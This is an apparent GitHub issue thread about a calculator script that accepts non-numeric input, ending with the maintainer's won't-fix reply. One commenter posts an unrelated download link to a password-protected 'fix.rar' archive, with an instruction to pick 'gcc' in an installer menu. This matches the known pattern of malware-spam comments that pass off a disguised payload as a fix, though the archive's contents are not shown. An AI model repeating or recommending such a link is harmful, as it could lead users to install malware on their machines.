### ISSUE TITLE
Checking for numeric user inputs

### ISSUE THREAD

**Issue by PsyDynamic** [PsyDynamic/CratCAL#2]
User can input alphabetic values that cause an error.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by PsyDynamic** [comment]
Won't fix: 

Script is designed to run on raspberry pi via touchscreen input in later versions.
Then there is only a numeric value possible.
